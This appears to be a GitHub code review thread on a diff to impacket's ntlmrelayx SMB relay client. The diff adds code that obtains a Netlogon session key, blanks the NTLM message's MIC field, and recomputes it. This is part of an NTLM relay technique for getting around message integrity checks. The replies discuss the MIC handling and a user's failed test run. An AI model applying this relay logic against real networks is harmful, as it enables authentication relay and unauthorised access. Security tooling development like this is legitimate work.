impacket/examples/ntlmrelayx/clients/smbrelayclient.py

```diff
@@ -350,10 +473,35 @@ def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
         else:
             authData = authenticateMessageBlob
 
+        signingKey = None
+        if self.serverConfig.remove_target:
+            respToken2 = SPNEGO_NegTokenResp(authData)
+            authenticateMessageBlob = respToken2['ResponseToken']
+
+            errorCode, signingKey = self.netlogonSessionKey(authData)
+
+            # Recalculate MIC
+            res = NTLMAuthChallengeResponse()
+            res.fromString(authenticateMessageBlob)
+
+            new_auth_blob = hexlify(authenticateMessageBlob)[0:144] + b'00000000000000000000000000000000' + hexlify(authenticateMessageBlob)[176:]
```

Comment:
This just doesn't sound right. Are you trying to clear the previous MIC in order to calculate the HMAC_MD5 or something else?

Reply:
I'm clearing the previous MIC in order to calculate the new one (take a look at the next line - the relay_MIC)

Reply:
hi @msimakov , i am trying to use the script by myself and i am getting some errors. Basically i can see that i am able to retrieve the session key, but for some reason i cannot connect, i am using the following command just like @asolino said to use it in order to perform some tests.
by looking at wireshark on the relay endpoint i can see that, everything goes just like the article you published, but at the last message ( the one wit the new mic) i am getting Error:STATUS_INVALID_PARAMETER and the final login is failing.
Any ideas?

Reply:
Hi @zur250. Make sure to run the updated version, the file has been updated after this commit

Reply:
Hey @zur250. I think you have a mix of impacket versions installed. What is the banner you get when you run `ntlmrelayx.py`? (at the very beginning of its execution)